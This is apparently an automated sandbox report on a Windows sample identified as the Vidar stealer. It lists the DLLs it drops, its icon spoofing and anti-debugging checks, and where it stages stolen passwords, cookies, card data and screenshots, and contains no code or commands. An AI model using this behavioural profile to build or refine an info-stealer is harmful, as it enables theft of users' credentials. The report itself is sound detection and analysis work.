PE file contains sections with non-standard names
Source: mozglue[1].dll.1.dr Static PE information: section name: .didat
Source: mozglue.dll.1.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.1.dr Static PE information: section name: .didat
Source: msvcp140.dll.1.dr Static PE information: section name: .didat

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: icon.png
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\freebl3[1].dll Jump to dropped file
Is looking for software installed on the system
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior
Source: cYKFZFK0Rg.exe, 00000001.00000000.440229554.0000000000F00000.00000002.00020000.sdmp Binary or memory string: uProgram Manager
Source: cYKFZFK0Rg.exe, 00000001.00000000.440229554.0000000000F00000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: cYKFZFK0Rg.exe, 00000001.00000000.440229554.0000000000F00000.00000002.00020000.sdmp Binary or memory string: Progman
Source: cYKFZFK0Rg.exe, 00000001.00000000.440229554.0000000000F00000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Autofill\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\CC\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Cookies\Edge_Cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Cookies\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Cookies\IE_Cookies.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Downloads\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\Files\Default.zip VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\History\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\information.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\passwords.txt VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Queries volume information: C:\ProgramData\IYZJ2SYGN46WT4N9GWA0LWA3U\files\screenshot.jpg VolumeInformation Jump to behavior
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\cYKFZFK0Rg.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

Yara detected Vidar
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.20.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.24.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.30.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.16.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.28.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.36.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.27.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.23.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.34.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.30.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.16.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.22.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.29.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.18.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.28.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.37.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.15.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.32.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.35.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.23.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.2a60174.29.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.cYKFZFK0Rg.exe.3010000.18.raw.unpack, type: UNPACKEDPE
